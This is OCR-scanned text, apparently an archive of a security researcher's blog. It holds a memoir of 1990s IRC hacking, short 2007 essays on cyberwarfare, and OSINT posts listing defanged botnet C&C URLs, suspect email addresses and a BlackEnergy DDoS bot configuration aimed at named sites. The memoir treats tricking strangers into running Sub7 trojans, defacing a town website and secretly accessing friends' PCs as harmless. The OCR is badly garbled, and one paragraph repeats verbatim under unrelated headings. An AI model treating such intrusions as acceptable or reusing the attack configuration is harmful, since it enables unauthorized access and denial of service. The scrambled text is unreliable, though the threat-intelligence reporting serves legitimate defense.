and actually attempting to own the Scene. What | practically did at the time was to request 
several of my friends which were known to have been involved in the Scene at the time to 
forward and exchange a decent set of ICQ contacts of fellow members of the Scene which 
quickly empowered me with the necessary contacts to join several hacking groups in particular 
HackHouse and the Social Engineering Project where | was proud to be a member of. 


Among the first groups which | really joined at the time was Toxic Crisco which basically repre- 
sented a group of individuals involved in a variety of online activities including possibly hacking 
including the SCR Project which was basically a social engineering driven hacking group where | 
was proud to be a member of in particular my active involvement in reading various high-profile 
psychology books at the time. 


For the purpose of using IRC in particular DALnet Stan quickly gathered a copy of the popular 
mIRC including several War Scripts ICQ Bombers Nukers and Mail Bombers including tro-jan 
horses and quickly decided that he should start getting experienced in the world of hacking 
for the purpose of gaining knowledge and impressing his friends. Among the first channels 
that he actually joined at the time were #gay and #lesbian where he was basically portraying 
himself as another person who was basically seeking to offer a new and novel photos-based 
screensaver to a variety of individuals for the purpose of tricking them into executing the 
screensaver on their home PCs ultimately gaining access to their PCs using a popular trojan 
horse client at the time such as for instance Sub/7. 


On a beautiful Thursday afternoon Stan decided to play a decent computer game while his 
mother was busy ironing in the kid’s room and decided to take a journey successfully getting 
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the World rid of hostile aliens. The game called Duke Nukem basically took Stan on a journey 
to another World where he spend most of his afternoon getting rid of evil aliens while he led a 
discussion with his mother on his whereabouts during the day including active next-day class 
preparation and the eventual dinner conversation. While mom was busy ironing Stan took on 
another journey to a distant World where he took care of and protected the Earth from evil 
aliens and decided that the time has come for a rest. 


Some of the most memorable memories of Sten back in the time have to do with playing full- 
time one of the best strategy games during the 90’s that’s Sid Meier’s Civilization. Spending a 
decent portion of his time basically four hours on a daily basis Sten quickly acquired the nec- 
essary Skills to take his civilization to a new level by waging wars developing and exchanging 
new technologies and by waging wars with competing and adversary civilizations. 


Having already mastered the power of the Civilization game Sten quickly fell into a World of 
politics technologies and wars and successfully mapped and left a foothold in the World the 
way he knew and mastered having successfully spend a decent portion of his time playing the 
best strategy game during the 90’s that’s Sid Meier’s Civilization. Game World is something 
different. Whenever Sten decided to play a game the World came to a halt with Sten playing 
and learning the basics and inner workings of every game that he managed to get his hands 
on throughout the 90’s. 


Pushing the boundaries of the game at some point Stan decided to take a deeper look at how 
you can actually make the com-puter’s player become more advanced and sophisticated and 
actually tried to train the Al of the game and potentially figured out a way to teach to use 
advanced warfare tactics. 


The primary source of new games which were basically coming from Russian-distributed CDs 
at the time was Pavel Vitkov a close friend to Dancho who was actually possessing and was 
able to negotiate and obtain some of the latest and most popular games worth playing at the 
time. While Dancho was busy becoming a master of Sid Meier’s Civilization most of his friends 
and colleagues at the time were busy playing another game part of the franchise known as 
Colonization which despite the fact that it was pretty similar to Sid Meier’s Civilozation couldn’t 
really offer the necessary global politics and war strategy tactics including possible espionage 
tactics which Dancho was looking for in a modern game at the time. 


It would be fairly easy to assume how things got complicated with Sten quickly obtaining access 
to Internet Relay Chat’s primary mIRC application including a variety of IRC-based “War Scripts” 
including a dozen of mail-bombers and various other ICQ-based type of Nukers and Flooders on 
his way to demonstrate a proper technical know-how to his friends and peers in the shady world 
of hacking. Among the first channels he tried to access were #hacker #hackers #hacking and 
the infamous #hackphreak on EFNet including to actually open several personal channels on 
the local IRC networks including #drugs #KGB and #linuxsecurity. At a later stage he actually 
managed to ask a friend for a possible operator status on the local town’s IRC channel where 
he was basically running a 24/7 online protection bot known as xploit including the active use 
of a Socks5 server which at the time was offered by his employer LockDownCorp where he 
was busy acting as Technical Collector of trojan horses/worms/viruses and VBS scripts for the 
purpose of improving the anti-trojan software’s signatures-based detection rates. 


Sample Socks5 Commercially-available servers courtesy of LockDownCorp one of Stan’s cur- 
rent employers at the time which he used to increase his reputation on the local IRC Network 
and to actually hide his real IP 


Among the first thing that Stan decided to do in his spare time is to actively research the 
local Webmaster of his hometown’s official Web site for the purpose of attempting to launch 
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a social engineering attack against his local town’s official Web site which basically succeed 
and resulted in a “greeting” message being posted on the official Web site with no actual data 
destruc-tion and data removal taking place in what would appear to be a professional approach 
when compromising a legitimate Web site for the purpose of greeting his personal friends and 
spread a message on behalf of “Trojan Hacking Group” which at the time basically consisted 
of one of his closest friends and another fellow hacker enthusiast. 


Sample Web Site Defacement courtesy of Stan throughout the 90’s which basically resulted in 
a personal message and a personal greeting to all of his friends at the time courtesy of “Trojan 
Hacking Group” 


Among his’ responsibilities the time included the active collec-tion of trojan 
horses/worms/viruses and VBS Scripts with the idea to share them with his employer 
which at the time was LockDownCorp one of the world’s leading anti-trojan vendors for the 
purpose of improving the detection rate for these publicly accessible trojan horses in what 
would later on mature into a successful Technical Collection operation which basically paid 
his bills and actually offered him a decent financial incentive to continue getting involved in 
security as a hacker enthusiast and actually improved his employer’s overall detection rate 
for some of the most prolific trojan horses at the time. 


The actual contractual agreement had to do with Stan using a private FTP server where he 
would spend hours uploading collected trojan horses using his home-based dial-up connec- 
tion and eventually earning a revenue in the process using Western Union where he was happy 
to have established direct working relationship with one of the world’s leading anti-trojans 
vendors which at the time was located at - http://proxy2.stealthedip.com/maniac/incoming/ 


Sample Directory Listing of Stan’s personal directory at oxy2.stealthedip.com/maniac/incoming/ 
LockDownCorp’s FTP server where he was busy collecting and = sharing trojan 
horses/worms/viruses and VBS Scripts and actually earning revenue in the process 


Whenever Stan would attempt to reach out to his friends he would attempt to find out whether 
they are online using a popular trojan horse including to actually check his email account for 
their recently changed passwords and other related information including their current IP so 
that he can properly connect to their home PC for educational purposes. 


The primary purpose for connecting to a friend’s PC using a popular trojan horse would be 
purely for educational purposes with no actual hard or any sort of eavesdropping taking place. 


While Dancho was busy studying in the Netherlands he was busy persistently checking one 
of the World’s most popular and high-trafficked Web sites for hackers and security experts 
Astalavista.com - and sticking to the common wisdom circa the 90‘s where everyone was busy 
making contributions and launching new groups - he decided to approach the company behind 
the portal with a possible business proposal that basically consisted of having him monitor and 
actually maintain the portal in terms of content including the actual production of a high-profile 
Security Newsletter where we would produce security and hacking articles including a featured 
Security Interview with key members from the Scene and the Security Industry. 


Sample Screenshot of the Astalavista.com Information Security Portal which Dancho Danchev 
was running as a Managing Director 2003-2006 where he was basically responsible for all the 
content 


Prior to getting a confirmation from a Team Member of the actual owner of the portal at the time 
Dancho quickly began entering into negotiations about a possibly paid including a free venture 
at the time where he could earn a small comission for producing a high-quality security newslet- 
ter and actually be responsible for all the security and hacking content at Astalav-ista.com on 
a monthly and daily basis. 
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Sample Screenshot of Astalavista.ch’s About Us Section where Dancho Danchev used to work 
during his student years in the Netherlands as a Managing Director at Astalavista.com 


As he began working on the monthly newsletter the first issue including the remaining twenty 
six issues which he produced over a period of three years were quite a success including the 
actual Geeky Photos section where portal users could send in photos of their desktop computers 
for the purpose of featuring them at the Web site potentially promoting their desktop setups 
to our audience at the time eventually leading him and the portal to win a PCMagaine Top 100 
Security Sites Award back in 2005. 


Sample screenshot of Dancho Danchev’s Astalavista.com Winning a PCMagazine.com Top 100 
Security Sites Award for 2005 


Among Dancho’s main responsibilities at the time where the daily updating of the portal with 
high quality security documents tools and presentations including actual hacking and security 
links and overall responsibility for all the content at the Web site including the production of a 
highly popular security newsletter at the time including to actually answer and work on possible 
partnership and advertising inquiries at the time which led to a successful repositioning of the 
portal as one of the primary information security portal services online. 


Among the key folks and individuals that he interviewed during his management of Astalav- 
ista.com and asked some pretty decent and relevant questions at the time include: 


Proge, Progenic.com 

Jason Scott, TextFiles.com 

Kevin Townsend, ITSecurity.com 
Richard Menta, BankInfoSecurity.com 
Mr. Yowler, Cyberarmy.net 

Prozac, Astalavista.com 

Candid Wuest, Security Researcher 
Anthony Aykut from Frame4.com 

Dave Wreski from LinuxSecurity.com 
Mitchell Rowton from SecurityDocs.com 
SnakeByte from Snake-Basket.de 

Bjorn Andreasson from Warlndustries.com 
Bruce from DallasCon.com 

Nikolay Nedyalkov from ISECA.org 
Roman Polesek from Hakin9.org 

John Young from Cryptome.org 

Eric Goldman EricGoldman.org 

Robert, CGISecurity.com 


Johannes B. Ullrich, CTO of the Sans Internet Storm Center, and the main developer behind the 
Dshield.org project 


Daniel Brandt, Google-Watch.org 
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David Endler, TippingPoint.com 
Vladimir, 3APA3A, Security.nnov.ru 
Johnny Long, johnny.ihackstuff.com 
Martin Herfurt, Trifinite.org 


Personal Photo of Dancho Danchev Presenting at CyberCamp 2016 on “Exposing Koobface - 
The World’s Largest Botnet” 


Being the World’s most notable cybercrime researcher security blogger and threat intelligence 
analyst the researcher quickly gained fame by systematically and efficiently profiling and ana- 
lyzing a decent snapshot of malicious nation-state and fraudulent activity online leading him to 
pursue a successful career as the World’s most popular cybercrime researcher security blogger 
and threat intelligence analyst. 


In an early Monday morning the researcher quickly gathered a set of research materials of the 
primary botnet that’s he’s been monitoring the infamous Koobface botnet using passive and 
active virtual SIGINT methodologies which basically include active sampling of the botnet’s 
malicious online activities using a daily set of intercepted malicious and fraudulent campaigns 
launched managed and operated by the Koobface botnet for the purpose of providing the 
necessary technical operational and strategic OSINT type of intelligence including the daily 
batch of money mule recruitment domains and campaigns which he was busy profiling with the 
idea to assist U.S Law Enforcement on its way to track down and prosecute the cybercriminals 
behind these campaigns. 


The Koobface botnet was the primary botnet propagating over social media at the time in 
particular Facebook and has already managed to affect tens of thousands of users globally 
potentially enticing them to interact with rogue and visual social engineer-ing based type of 
malicious and fraudulent campaigns in the form of Fake Adobe Flash Players and fake YouTube 
videos where the ultimate goal would be to attempt to affect their friends on Facebook by 
sending automated and legitimately looking messages including links to rogue and malicious 
content. 


What what particularly interesting about the Koobface botnet at the time was the easy to track 
down and monitor actual C &C and campaign infrastructure where | was busy tracking it down 
and publishing my findings on a daily basis for the purpose of empowering my blog readers 
and the security community with the necessary threat intelligence on the actual whereabouts 
of the Koobface botnet in terms of offering as much technical details as possible with the idea 
to profile and keep track of its campaigns potentially assisting Facebook at the time including 
fellow security researchers on their way to track down and monitor the campaign. 


Bonus Content - Visiting GCHQ 


Back in 2008 | got the personal privilege to attend a high-profile conference event organized 
by the Honeynet Project at the GCHQ where | got a personal invitation to attend the event and 
make a presentation on the topic of cybercrime research which | did and actually attended the 
event where | had the privilege and honor to meet some of the key people behind the Honeynet 
Project where we exchange ideas and | had the privilege to make a high-profile presentation 
which is entitled "Intell on the Criminal Underground - Who’s Who in Cybercrime for 2007". 


Bonus Content - Interpol Conference 


In 2010 I’ve received a direct invitation to attend one of the industry’s leading invite-only 
cybercrime fighting conference which at the time was held at an undisclosed location where 
| had the privilege to held a high-profile presentation on money mule recruitment technique 
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and practices including to actually meet and hang out with some of my friends and colleagues 
from the security industry which was quite a privilege and an honor. 


Bonus Content - RSA Europe 2012 


Back in 2008 | got the personal privilege to attend a high-profile conference event organized 
by the Honeynet Project at the GCHQ where | got a personal invitation to attend the event and 
make a presentation on the topic of cybercrime research which | did and actually attended the 
event where | had the privilege and honor to meet some of the key people behind the Honeynet 
Project where we exchange ideas and | had the privilege to make a high-profile presentation. 


Bonus Content - CyberCamp 2016 


Back in 2008 | got the personal privilege to attend a high-profile conference event organized 
by the Honeynet Project at the GCHQ where | got a personal invitation to attend the event and 
make a presentation on the topic of cybercrime research which | did and actually attended the 
event where | had the privilege and honor to meet some of the key people behind the Honeynet 
Project where we exchange ideas and | had the privilege to make a high-profile presentation. 


Bonus Content - InfoSec 2012 


Back in 2008 | got the personal privilege to attend a high-profile conference event organized 
by the Honeynet Project at the GCHQ where | got a personal invitation to attend the event and 
make a presentation on the topic of cybercrime research which | did and actually attended the 
event where | had the privilege and honor to meet some of the key people behind the Honeynet 
Project where we exchange ideas and | had the privilege to make a high-profile presentation. 


Stay tuned! 


1, ivepe://otoggor. googleusex content con/ing/t/R29VZ201/AVWRSERDOT_2ahsPYGma bb OOF TSSHE_DYZgal ava 
2. https: //archive.org/download/cyber-intelligence_20210817/cyber-intelligence_611b8774.pdf 

3, hotps://elogger .googleusercontent<on/ing/o/R29vZ2x1/AVvksEgaCgull'22pgolth ax 414SLzn_Ri0 2H gait 
“netps: blogger googleuserconvent, con/ing/b/126v22x1 AVWRSERjnoav ENO; cDOTSTaojapzoJeanthYVfasKPHAIB VE 

" netps:/ blogger. googleusercontent, con/g/¥/126V2231 AVWSENEFCTONEORIOTg6O_xe in BORIT Tan TAPS6Gz<Kapr 


YikKdILVG- IPEy75gvgymu62BN3351WXDgrKcnJpyGhx07HqZh- 0S: 
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18.10.18 Leadership Basics - An Analysis (2022-10-26 18:43) 


ke 


[1] 
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NOTE: 


| wrote this article back in 2007. Here’s the [2]achive. [3]Jefrey Pfeffer’s Business 2.0 columns 
always load me with self-esteem, and provoke me to go beyond the patters of success, the 
ones I’m aware of. Integrity is an important quality, and so it adaptability and the enlightment 
of constant self-development. 


| tend to have developed this internal Early Warning System for tensions. What does this mean? 
| use a cheap hushmail account, blogspot as a blogging platform, as I’m indeed trying to prove 
something - it’s not about the blogging platform, it’s not about being a domainer, it’s all about 
the knowledge. Respect to HD Moore for still sticking to his black background, exactly the same 
one | was using for several months. 


The chase of an utopian dream - perfection is a never ending driving force, you know you can 
never be perfect, since it’s hard to define, but the constant idea of trying to achieve something 
unachievable might indeed lead you somewhere. 


The ultimate question - what do others think about me? how would | be remembered when I’m 
gone? is where the problem starts. Being remembered means you’re already gone. 


There are three different dimensions of the "I", the one you really are, the one you want to me, 
and the one the people perceive you as. You’d better focus more who you actually are so you 
can do better, and who you want to be, than ending up as being anything else but "someone 
else’s expectation", more or less a transparent hologram of other people wanted you to be. 


What would others say? What if they don’t like it? What if it undermines my confidence in 
myself at the end of the day? Being hated, or having a "fan club" means you're definitely up 
to something, all you need to break through is believing it. 
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VCS GIVE YOU THEIR BEST IDEAS—AND $900 MALION TO LAUNCH THEM 


It's not just a hobby—some small sites 
are making big money. tT) 


Hanging out with the winners of the day is an every day reality, but the reality is that the true 
cyberpunks often hang outside at a party or con, far away from the populist speeches, and 
yet another 10k keynote mind-provoker. Still in need of a real-life story? Try Jessus, who was 
supposed to hang out with the posers, the ones that supposedly excelled in the society at the 
period of time, still he was dining with the opposite parties. 


To me, it’s always a matter of perspective and a vision. 


Reaching the "Trust no one" stage in your life means you’re definitely up to something, and 
most importantly had the courage to raise above, the consequences among the knives flying 
around, behind, and above you, are the opportunity costs you have sacrificed due to your 
behavior such as less time spent on chasing chicky chicks for instance. 


People easily forget themselves in the euphoria of temporary success, and while even the fact 
of forgetting yourself means you used to be someone, this desperate cry for self-awareness in 
itself is a pitiful personal milestone. 


Don’t fight for appraisal, but learn to praise yourself, be interested, not interesting, break out 
of definitions, and question everything, even yourself. 


1 
2. https: //web.archive.org/web/20060106091838/http: //money.cnn.com/magazines/business2/business2_archive/ 

3, https://jettreyptetter. con) 
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18.10.19 The Most Wanted Cyber Jihadist - An Analysis (2022-10-26 18:49) 


[1] 
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NOTE: 
| wrote this post in 2007. 


This would have been an important blog post if [2]cyber jihad were to be a issue that can be 
personalized, however, the reality as always has to do with another perspective, which in cyber 
jihad’s case is diversification, localization of knowledge, and a knowledge-driven cyber jihadist 
communities itself. 


My point is that this guy should not be considered as the public face of cyber jihad, now that 
he’s no longer active as a cyber jihadist, he’s a cyber martyr that will be inspiring another 
generation of wannabe cyber jihadists to come. 


[3]Here’s the article: 


"In addition, Tsouli Irhabi used countless other web sites as free hosts for material that the 
jihadists needed to upload and share. The true extent of his material distribution network is 
still not known. He is credited with the large scale distribution of a film produced by Zarqawi 
called "All Is for Allah’s Religion. His arrest struck a significant blow to al Qaeda’s cyber ter- 
rorism weaponry. With cyber weaponry only requiring widely available knowledge and skills 
and the only equipment required a computer that can be purchased anywhere, cyber weapons 
proliferation cannot be controlled." 


My favorite quote - "With cyber weaponry only requiring widely available knowledge and skills 
and the only equipment required a computer that can be purchased anywhere, cyber weapons 
proliferation cannot be controlled. These facts coupled with the recent cyber attacks on utilities 
that blackout cities and regions show this is a serious threat." 


Wait a sec. PSYOPS is a practice by itself which in this case aims to increase the investments 
made into securing the critical infrastructure of a country, one that | bet even the bad guys 
stopped targeting due to the logical nature of the attack? It is such a practice. Moreover, 
remember another such PSYOPS practice, namely the desired "media-echo" effect achieved? 


Stay tuned! 
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1. https://blogger. googleusercontent . com/img/b/R29vZ2x1/AVvXsEi3szg- J1McxqsZZZ0j c-RQMO4pmUUdKxcQ j px6EQkpt cLz 
YzCSzrz620vM7XWhvGPI1hObEQMohG3gC1K1_rdA26cUI9euIqEs 
2. https: //ddanchev.blogspot .com/search/label/Cyber%20Terroris 


3. https://www.washingtonpost .com/archive/opinions/2006/03/26/terrorist-007-exposed/12a2ebfe-b28d-4f7e-89c9 
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18.10.20 A Pragmatic Cyberwarfare Doctrine - What Money Cannot Buy - An Analysis 
(2022-10-26 18:54) 


[1] 


NOTE: 


| wrote this post in 2007. These are basically some notes that | took on the emerging back then 
[2]cyber warfare doctrine problem that the U.S was facing. 


Key summary points: 
- never let an insider do an outsider’s job 
-the convergence of conventional military capabilities and asymmetric warfare 


- bombing the source of the attack means, you'll have a U.S strategic bomber bombing a place 
somewhere in the U.S. 


- subverting the enemy without fighting 
- cyberwarfare attack from inside the fortification 
- virtual cyber warfare competitions in a controlled environment 


When you dedicate the largest proportion to keep up with the conventional military arms race, 
it’s the superpower, or a third world country that would defeat your entire conventional military 
arsenal by not even confronting with it, and thus, by lacking the point of engagement render 
it useless in the sense of directly bypassing it. 
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Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEjGABnfH4F 6RUZraG1o7YOmqIwrbbfawtzAOmDJuws07Z- 14d 
FSAVJmog40C J JE94ZxZzWToGOvxNbGOsr-ht9tAt2b04_GtF5liv 
2. https://ddanchev. blogspot .com/search/label/Cyber/20Warfare 


18.10.21 Should a Country Physically Bomb the Source of the Cyber Attack? - An 
Analysis (2022-10-26 18:59) 


[1] 


7 


B. 


NOTE: 
| wrote this post in 2007. 


It all started with the basic speculation that a superpower should aim to physically bomb the 
source of the cyber attack. 


Here are some thoughts: 


- physically bomb the source of the attack is not a metaphor, its an indication of the wrongly 
understood situational awareness 


- install a hxxp://makelovenotspam.com type of screensaver on each and every U.S government 
PC, have it periodically obtain the last list of hosts to be attacked, obtained from a central Target 
List repository 


- if the U.S is to attack those attacking the U.S, a third party interested in taking advantage of 
the U.S’s bandwidth and know-how would easily make it look like someone else is attacking 
the U.S and have the U.S attack the third party enemies 
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- the myth of lining up your army, and waiting for the other army to appear at a particular 
battlefield doesn’t exist in a cyber guerilla information warfare, where you’re the visible target, 
and your enemy is everywhere. 


- each and every of the comments regarding the stereotyped type of adversary talk like the 
adversary has a home address, physical headquarters 


- there’s no physical location to be bombed, there’s no IP to be DDoS-ed since it’s not theirs, 
there’s no home PC of the commander to take control of. 


The bottom line, some of the most insightful and visionary for decades to come cyber warfare 
research papers I’ve ever read, were written by U.S army researchers. However, as if pretty 
much everything else in life, those who don’t know are usually the one holding up the positions 
where they’re supposed to know more than everyone, and exactly the opposite. 


Stay tuned! 


1. https://blogger. googleusercontent .com/img/b/R29vZ2x1/AVVXsEij6rv1jGzBc4sObVQSYuBBqOI j sTHzc5N7rMIHkCX8C5z- 
kOGUFuPil_f_BEtYwWMg3MGhiGwg8P7ZDdL_uwUPLieeL6hA1JTvMx 


18.10.22 The U.S is Facing a Cyber Warfare Doctrine Crisis - An Analysis 
(2022-10-26 19:02) 


[1] 
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NOTE: 


| wrote this blog post in 2007. Is it just me, or | get depressed when | come across the words 
- U.S Cyber Command, Twiki.net and serial entrepreneur in the same article? Someone once 
said that in the long term mega corporations and governments will be mainly involved in Talent 
Wars, and he was right. After reading this article, | bet that Chinese cyber warriors will issue 
an email to their internal mailing list entitled "The Depressing State of the U.S’s Cyber Warfare 
Doctrine" and someone will respond "What Cyber Warfare Doctrine?!". Cutting the sarcasm, 
this is either a sophisticated PSYOPS to on purposely let others underestimate the Cyber Com- 
mand’s upcoming decentralization point in history, or Human Resources department in the 
rush to meet a deadline. 


Great stuff, so if every agency is doing whatever every agency feels like doing, you'll have 
several agencies collecting intelligence on the same individual/group of individuals, who will 
inevitably end up in a situation where they'll be collecting raw and unique to them only data, 
one that some of the other agencies would have already obtained and marked as outdated and 
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irrelevant under the current circumstances. 


Why the emphasis on decentralization, when it should be on distributed management as a 
concept? 


How can you centralize your opponents when they've already reached the unrestricted warfare 
stage, and have long been envisioning the potential of people’s information warfare? 


| guess that is the core of decentralized management is that everyone is doing whatever he 
feels like doing. 


Stay tuned! 


1. https: //blogger. googleusercontent . com/img/b/R29vZ2x1/AVvXsEhtpZ7WLsEcWF sEM9h1dWr0 jwkU8sjx50_FW9g4B5qMq2rEd 
w_aN54f£MDQnenLvyyfDimmB80007vLu__Oge4yS1GLc5_gt6zHwG4 


18.10.23 Bureaucratic Warfare Against Unrestricted Warfare - An Analysis 
(2022-10-26 19:05) 


[1] 


NOTE: 


| wrote this blog post in 2007. In a people’s information warfare scenario, the masses of end 
users wanting to contribute bandwidth being recruited on a nationalism level, will simply infect 
themselves with malware courtesy of the technical crowd possessing the capabilities to come 
up with such a malware. In an arrogant people’s information warfare, the technical crowd or 
the "bot source compilers generation" will not just distribute DoS attack tools and a targets 
list, they will backdoor the DoS tool itself, just like the case with this tool which | believe was 
distributed during the frontal hacktivism attack. 


Moreover, it wasn’t a cyberwar, as it any type of war you have both sided loosing or gaining 
tactical advantage, it was a virtual "shock and awe". 


Stay tuned! 
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1. https: //blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEikF£WGKcbla3XpV1TvQmuYvivbVwLzHUn9gcl jhKvfLvL4Z 
QfSmDOgmDkx07 _CZhD86Qk77hemkp2krTFVuUnNU6- AEnWr 1 YUOYO. 


18.10.24 Ten Signs It’s a Slow News Week - An Analysis (2022-10-26 19:07) 


[1] 


NOTE: 
| wrote this blog post in 2007. 


Articles starting that malware increased 450 % during the last quarter - of course it’s sup- 
posed to increase given the automated polymorphism they’ve achieved thereby having 
anti virus vendors spend more money on infrastructure to analyze it 


Articles starting that soam and malware attacks will increase and get more sophisticated 


Articles discussing a new malware spreading around instant messaging networks - psst 
they’re hundreds of them currently spreading 


Articles discussing how signature based malware scanning is next while an anti virus ven- 
dor’s ad is rotating on the right side of the article 


Articles commenting on an exploit code for a high risk vulnerability made public - it’s 
been usually circulating around VIP underground forums weeks before it made to the 
mainstream media, with script kiddies leaking it to other script kiddies 


Articles pointing out how phishers started targeting a specific company 
Article emphasizing on how mobile malware will take over the world, despite that there 


no known outbreaks currently active in the wild 
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¢ Articles pointing out that having a firewall and an updated anti virus software is important 
e Articles discussing which OS is the most secure one 


¢ Articles mentioning the percentage increase in the thousands of spam and phishing emails 
for the last quarter 


Stay tuned! 


1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEh6Hc7zAvHjcKkDrokeB8BsHPpiyo j 6mwRONbDuLP4f PDOtI 
x7kK1LBWNZ1Lu1jacre_BmAdCtJEmhtp_cXCs22TkKcUr9y8Go38Y 


18.10.25 Spotting Moguls - An Analysis (2022-10-26 19:12) 


[1] 


NOTE: 
| wrote this blog post in 2007. 
What’s so bad in being a mogul? 


¢ Moguls are boring 
¢ Moguls are predictable 
¢ Moguls are biased 


* Moguls often use their company’s over-valued financial performance - excluding the initial 
investment - as a speaking platform 
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¢ If Moguls blog, it would be on the Insecurities of Sun Tanning and everything in between 


¢ Moguls conveniently "exclude the middle" taking credit for the Moon’s announcing 
phrases 


¢ Moguls often whine when they should scream 

¢ Moguls preach, rather than teach 

¢ Moguls neatly restart the threat cycle of a particular threat in a mostly self-serving manner 
* Moguls spend too much time not just looking into the mirror, but talking to its reflection 


¢ Moguls are bad the way synthetic drugs are, and with the time you don’t have a choice 
buto start listing to "those voices" - rats have big ears. 


¢ Moguls are a bad, yet amusing necessary evil, one that must be professionally dealt with. 


¢ Even more amusing they become, as they start baby booming. 


Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEi5YYuPUNDhEf sZ1ch3X-nMLOTnFFWoX703JOX£M4zqRfS7 


khjShrRk8c4g0ktxmNsO08PvjFCS6Covs144dpTzVA7XZuod3wKHI1iR 


18.10.26 My New RSS Feed - Part Two (2022-10-27 10:41) 


cha, 
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Dear blog readers, 


I’ve decided to let everyone know that my new [2]RSS feed is also available in [3]XML and 
[4]JSON. 


Enjoy! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEik2K4wFkEf g- kexOxuwEu24igkrKhHHLr 1IuMmhHQBhbO5a 


2, httpe://feedpress ne/DancheDanchevOnSecurityhndNewtedia 
3. hetps://Leedpress.ne/DanchoDanchevOnSecurityandlewtedi.a. xa 
4. hetps://feedpress.ne/DanchoDanchevOnSecurityAndNewtedia. jaod 
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18.10.27 Exposing "Emennet Pasargad/Eeleyanet Gostar/Net Peygard Samavat" 
Iran-Based Company on FBI’s Most Wanted Cybercriminals List - An OSINT 
Analysis (2022-10-27 10:41) 


[1] 
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wd So 
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I’ve recently came across this [2]IC3 notification on Emennet Pasargad also known as Emen- 
net Pasargad or Net Peygard Samavat and I’ve decided to further enrich the actual technical 
information provided with the idea to assist everyone in their cyber attack and cyber campaign 
attribution efforts. 


Sample URL known to have been involved in the campaign: 
hxxp://eeleyanet.ir - 5.144.130.40 


Sample screenshots include: 


[3] 
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speen .info 
krapen .info 
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extrip .info 
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System errors detected. To prevent data lost system scanning ts started 
Scanning. [sesceceens 


Nardware errors 
Perfomance of your PC is low due to a fle system error. It was caused by the 


polear .info 
benber .info 
kedder .info 


changes malicious software made in your system flies and numerous open ports used 
by spyware to transfer your privacy dats. Your personal data safety in danger. 


Privacy information errors 


Spyware has stolen your personal nformaton. 

You can see the contents of the stolen block below: 
Country: 

Oty: 


— 


Windows Internet Explorer 


Windows is scanning your system fer threats, ee ee ee ee 
Please refrain from closing the window until the scanning 
Vega recon yout tlt vere of rt At rosette your Pfr teas ae ante ety ese 


Cox J 


2607 


[4] 
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EMEN NET PA‘ 
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Sample related personally identifiable email address accounts known to have been involved 
in related campaigns include: 


sidafin@mihanmail.ir 
safary.mansoor@gmail.com 
support@yahoolinkexchange.com 
faranakbehjati@yahoo.com 
amirhaghighi2014@yahoo.com 
h.boloukat@gmail.com 
Rahimi@Live.com 

Stay tuned! 


1. https: //blogger . googleusercontent .com/img/b/R29VZ2x1/AVvXsEgg_VPGtvaL6v5Q8dQijkQf 14PWuubFCu45q48iH8XzMITbx 
bX j 8WZ5q8A7cL8RzwwEWQNDm1Bm- oa4qHC7m1FPZexPf JKUaITcslx 


2, hetpe //ww.4c9. gov/Media/Iiews/2022/221020.paf 
3, hvtps://blogger.googleusercontent .con/ing//R29vZ2x1 /AVwKsEjpE0Gr_MEAUSRL JFCKY jl qOaouachFO-glivFIXyJ6_A@d 
4. 


PRdb5qqipdShOUAzk320AMBwrCkVE6mKqT j tBzhsQBVoGFy740j5T 


18.10.28 Who DDoS-ed Georgia/Bobbear.co.uk and a Multitude of Russian Homosex- 
ual Sites in 2009? - An OSINT Analysis (2022-10-27 17:38) 


H 


[1] 
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NOTE: 
| took these screenshots circa 2009. 
UPDATE: 


Here are some of the related botnet C &C server domains known to have been involved in the 
Campaign: 


hxxp://cxim.inattack.ru/www3/www/ 
hxxp://i.clusteron.ru/bstatus.php 
hxxp://203.117.111.52/www7/www/getcfg.php (cxim.inattack.ru) 
hxxp://cxim.inattack.ru/www2/www/stat.php 
hxxp://cxim.inattack.ru/www3/www/stat.php 
hxxp://cxim.inattack.ru/www4/www/stat.php 
hxxp://cxim.inattack.ru/www5/www/stat.php 
hxxp://cxim.inattack.ru/www6/www/stat.php 
hxxp://finito.fi.funpic.org/black/stat.php 
hxxp://logartos.org/forum/stat.php - 195.24.78.242 
hxxp://weberror.cn/be1/stat. php 
hxxp://prosto.pizdos.net/ _lol/stat.php 
hxxp://h278666y.net/www/stat.php - 72.233.60.254 


I’ve decided to share this post including related screenshots and technical details with the 
idea to inspire everyone to continue doing their research including cyber attack and campaign 
tracking and monitoring including cyber attack and cyber attack campaign attribution efforts. 


Back in 2009 there was a major speculation that Russia indeed launched a massive DDoS 
(Distributed Denial of Service) attack against Georgia which was in fact true. What was par- 
ticularly interesting about this campaign was the fact that the same DDoS for hire including 
the managed DDoS service that was behind the attack was also observed to launch related 
DDoS attack campaigns against bobbear.co.uk including a multi-tude of Russian homosexual 
Web sites where the actual Web sites indeed posted a message back then on their official Web 
sites signaling the existence of the DDoS attack targeting their Web sites. 
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Who was behind the campaigns? An image is worth a thousand words including the actual 


use of the original Maltego Community Edition back then which used to produce outstanding 
results in a variety of cases and cyber attack incidents and campaigns. 


Sample screenshots include: 


[2] 


Black Energy botnet status at 01:27:33 18.11.2008; 


[3] 
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Black Energy botnet status at 01:27:33 18,11,2008: 


[4][5] 


icmp_treq = DU 
icmp_size = 1000 

syn_freq = 2000 

spoof_ip= 1 

attack_mode = 0 

max_sessions = 30 

http_freq = 50 

http_threads = 20000000000000000000000 

tcpudp_freq = 500 

udp_size = 100 

tcp_size = 100 

cmd = flood http 

gogay.ru, igay.ru,androgin.ru, boysclub.ru,egay.ru, gaylines.ru, gaymoney.ru,gayplanet.ru, gayrelax.ru,xabalka.ru 
ufreq = 1 

botid = 


[6] 
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CopeTei mo padote c carom 


KOHMAM HOKA TD, HAMMAM KAMA TD 


Sample DDoS C &C domains known to have been involved in the campaign include: 
hxxp://emultrix.org 

hxxp://yandexshit.com 

hxxp://ad.yandexshit.com 

hxxp://a-nahui-vse-zaebalo-v-pizdu.com 

hxxp://killgay.com 

hxxp://ns1.guagaga.net 

hxxp://ns2.guagaga.net 

hxxp://ohueli.net 

hxxp://pizdos.net 

Sample DDoS C &C domain URLs known to have been involved in the campaign include: 
hxxp://a-nahui-vse-zaebalo-v-pizdu.com/a/nahui/vse/zaebalo/v/pizdu/ 
hxxp://prosto.pizdos.net/ _lol/ 

